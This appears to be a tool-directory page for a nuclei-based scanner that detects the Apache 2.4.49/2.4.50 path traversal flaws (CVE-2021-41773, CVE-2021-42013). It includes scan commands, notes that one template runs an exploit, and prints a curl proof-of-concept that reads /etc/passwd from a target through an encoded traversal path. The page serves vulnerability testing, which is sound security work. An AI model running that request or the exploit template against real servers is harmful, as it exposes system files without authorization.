Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
apache-vulnerable — Detects Apache HTTP Server path traversal vulnerabilities (CVE-2021-41773, CVE-2021-42013) by checking for exposure of /etc/passwd through various traversal techniques. | Kitploit
Tools/GitHubGitHub/psibot/apache-vulnerable
Vulnerability ScannersWeb Vulnerability ScannersVulnerability AnalysisExploitationWeb SecurityPenetration Testing
GitHubpsibot/apache-vulnerable

apache-vulnerable

Detects Apache HTTP Server path traversal vulnerabilities (CVE-2021-41773, CVE-2021-42013) by checking for exposure of /etc/passwd through various traversal techniques.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Scan FOR APACHE versions "ZERO-DAY"

Apache Version 2.4.49 and 2.4.50

(CVE-2021-41773) and (CVE-2021-42013)

How to use :

You Will need nuclei !

https://github.com/projectdiscovery/nuclei

Check local nuclei install and verify template

nuclei -t apache-vulnerable-versions.yaml -vv

and

nuclei -t apache-path-traversal-rce-v2.yaml -vv

You should see

[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]

and

[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]

To scan target :

nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port

To scan targets in a file :

nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt

Info about Nuclei templates

apache-vulnerable-versions.yaml - Detects version of Apache and will output HIGH if vulnerible.

apache-vulnerable-versions.yaml

apache-path-traversal-rce-v2.yaml - Will run a exploit and show the path vulnerible. Will output CRITICAL if vulnerible.

apache-path-traversal-rce-v2.yaml

POC :

curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

POC

Download Tool